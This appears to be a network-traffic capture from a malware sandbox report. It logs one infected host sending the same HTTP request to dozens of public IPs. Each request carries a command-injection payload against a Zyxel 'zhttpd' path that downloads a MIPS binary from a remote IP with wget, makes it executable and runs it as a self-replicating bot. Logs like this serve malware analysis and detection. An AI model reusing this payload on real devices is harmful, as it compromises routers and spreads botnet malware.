                                    Jan 13, 2024 19:02:51.592372894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8825192.168.2.1342324155.231.100.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592438936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8826192.168.2.1348242188.225.49.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592488050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8827192.168.2.1355138202.22.152.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592552900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8828192.168.2.1342074136.180.195.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592595100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8829192.168.2.1351928118.37.198.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592657089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8830192.168.2.133481261.155.219.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592694998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8831192.168.2.13388801.179.232.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592761040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8832192.168.2.1337404170.225.105.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592820883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8833192.168.2.1358670100.160.246.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592879057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8834192.168.2.13380845.113.14.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592931986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8835192.168.2.134869467.42.110.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.592992067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8836192.168.2.1342298126.99.156.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593054056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8837192.168.2.1351598150.163.120.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593116999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8838192.168.2.133869271.95.50.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593183041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8839192.168.2.134871666.172.60.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593236923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8840192.168.2.135329447.131.37.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593298912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8841192.168.2.135486895.143.48.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593350887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8842192.168.2.135803838.201.123.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593400002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8843192.168.2.1355140128.127.199.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593458891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8844192.168.2.1338360218.66.100.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593519926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8845192.168.2.1345230106.37.194.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593580008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8846192.168.2.135307238.91.71.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593626976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8847192.168.2.1348018193.32.163.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593688011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8848192.168.2.1338040139.7.166.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593741894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8849192.168.2.133607613.61.190.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593803883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8850192.168.2.1337962194.230.87.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593847990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8851192.168.2.135311274.126.77.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593923092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8852192.168.2.1335860182.23.114.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593947887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8853192.168.2.134164045.99.126.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.593976021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8854192.168.2.1349102222.34.55.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594042063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8855192.168.2.1346296198.150.143.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594094992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8856192.168.2.1356144220.18.176.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594151974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8857192.168.2.133540691.159.178.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594211102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8858192.168.2.135730094.251.83.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594234943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8859192.168.2.1360516192.182.186.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594296932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8860192.168.2.1345174138.123.91.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594343901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8861192.168.2.133572887.187.241.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594376087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8862192.168.2.1339088193.14.216.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594429970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8863192.168.2.1353936138.190.46.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594460011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8864192.168.2.1353076101.115.209.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594510078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8865192.168.2.135884099.150.160.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594542027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8866192.168.2.135249446.135.87.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594605923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8867192.168.2.1348090173.195.111.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594660997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8868192.168.2.1358404113.179.61.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594722033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8869192.168.2.133765231.84.248.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594759941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8870192.168.2.1355504212.38.50.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594806910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8871192.168.2.133569844.223.6.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594861984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8872192.168.2.134224086.186.78.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594911098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8873192.168.2.135915285.203.122.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.594957113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8874192.168.2.1342232145.78.187.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595011950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8875192.168.2.135202289.24.215.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595050097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8876192.168.2.133744618.206.11.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595093012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8877192.168.2.1333560125.179.89.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595149040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8878192.168.2.133762840.236.16.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595220089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8879192.168.2.133418042.163.32.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595252037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8880192.168.2.1335070206.246.210.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595309973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8881192.168.2.1341764204.2.225.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595357895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8882192.168.2.1355250192.16.27.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595395088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8883192.168.2.135691845.30.99.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595451117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8884192.168.2.1351080187.112.157.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595510006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8885192.168.2.1336544108.144.250.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595566034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8886192.168.2.1354208176.200.48.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.595637083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8887192.168.2.1354452222.130.198.38443
                                    TimestampBytes transferredDirectionData
